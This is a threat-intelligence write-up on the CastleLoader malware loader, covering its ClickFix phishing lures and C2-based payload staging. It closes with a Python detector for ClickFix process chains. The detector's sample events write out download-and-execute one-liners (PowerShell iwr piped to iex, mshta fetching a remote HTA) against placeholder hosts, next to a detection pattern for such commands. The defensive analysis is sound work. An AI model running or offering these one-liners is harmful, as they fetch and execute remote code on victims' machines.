CastleLoader is a newly identified, versatile malware loader linked to campaigns that distribute information stealers and remote access trojans (RATs). Observed earlier this year, it has been seen delivering several malware families, including DeerStealer and RedLine. It relies on ClickFix-style phishing pages and fake code repositories to deceive users, and uses anti-analysis techniques such as dead code injection to evade detection. Its modular architecture separates the initial infection from payload execution, which makes it harder for investigators to attribute an intrusion to a particular operator. Distribution relies on lookalike domains and on prompting the victim to perform an action that triggers the infection.
CastleLoader uses dead code injection and packing to hinder static analysis. After unpacking itself at runtime, it connects to its command-and-control (C2) server, downloads the modules chosen for that target, and executes them.
CastleLoader's modular structure allows it to act as both a delivery mechanism and a staging utility, complicating attribution and response by separating the initial infection from payload deployment.
Payloads are distributed as portable executables (PEs) with embedded shellcode; the shellcode connects to the C2 server to fetch and execute the next-stage malware.
Campaigns that use CastleLoader rely on ClickFix phishing pages hosted on domains posing as software libraries and other familiar services. The page instructs the visitor to copy a command and run it themselves, so the user, not an exploit, launches the loader; this is why the initial process tree starts from an interactive shell or the Run dialog rather than from a document or browser exploit.
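The execution chain described above leaves a characteristic footprint in process-creation telemetry: a script interpreter or download-capable LOLBin started directly from the user's shell with a command line that fetches or decodes a remote payload. The detector below is an added example, not code from the original report or from the CastleLoader operators. It assumes the ClickFix lure targets the Windows Run dialog (so the parent process is explorer.exe), and the `SAMPLE_EVENTS` records, the `example.invalid` hostnames and the `Finding` type are constructed for illustration. It requires both conditions to fire, which keeps an administrator launching PowerShell from the Start menu, or a legitimate updater calling curl, out of the alert queue.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Interpreters and LOLBins a pasted ClickFix command typically lands in.
INTERACTIVE_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
}

# Command-line fragments that fetch, decode or hide a remote payload.
SUSPICIOUS_ARGS = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b"
    r"|-enc(odedcommand)?\b|-ec\b|frombase64string|\bmshta\b.*https?://|\bcurl\b.*https?://"
    r"|certutil.*-urlcache|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)

# Constructed, Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {   # ClickFix victim pasted a download-and-run one-liner into Win+R
        "pid": 4210,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -ep bypass -c "iwr https://cdn.example.invalid/verify.ps1 | iex"',
    },
    {   # Same lure, mshta variant
        "pid": 4388,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": "mshta https://cdn.example.invalid/lib/update.hta",
    },
    {   # Administrator opening PowerShell from the Start menu: benign
        "pid": 5011,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe",
    },
    {   # Vendor updater fetching a manifest: download indicator but no interactive parent
        "pid": 5120,
        "parent_image": r"C:\Program Files\Vendor\updater.exe",
        "image": r"C:\Windows\System32\curl.exe",
        "command_line": "curl https://updates.example.invalid/manifest.json -o manifest.json",
    },
]


@dataclass
class Finding:
    pid: int
    image: str
    reasons: list[str]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_clickfix(events: list[dict]) -> list[Finding]:
    """Flag events where an interpreter/LOLBin was launched from explorer.exe
    AND its command line carries download/execute indicators."""
    findings: list[Finding] = []
    for ev in events:
        child = _basename(ev["image"])
        parent = _basename(ev["parent_image"])
        reasons: list[str] = []
        if parent == "explorer.exe" and child in INTERACTIVE_HOSTS:
            reasons.append("interpreter launched directly from explorer.exe (Run dialog / shell)")
        hits = sorted({m.group(0).lower() for m in SUSPICIOUS_ARGS.finditer(ev["command_line"])})
        if hits:
            reasons.append("download/execute indicators: " + ", ".join(hits))
        if len(reasons) == 2:  # both conditions required to reduce false positives
            findings.append(Finding(ev["pid"], child, reasons))
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"pid={f.pid} image={f.image}")
        for r in f.reasons:
            print("   -", r)
```

On a real estate, feed the function Sysmon Event ID 1 or EDR process-start records with the same four fields; the `RunMRU` registry key under the user's hive records what was typed into the Run dialog and is a useful corroborating artifact during triage.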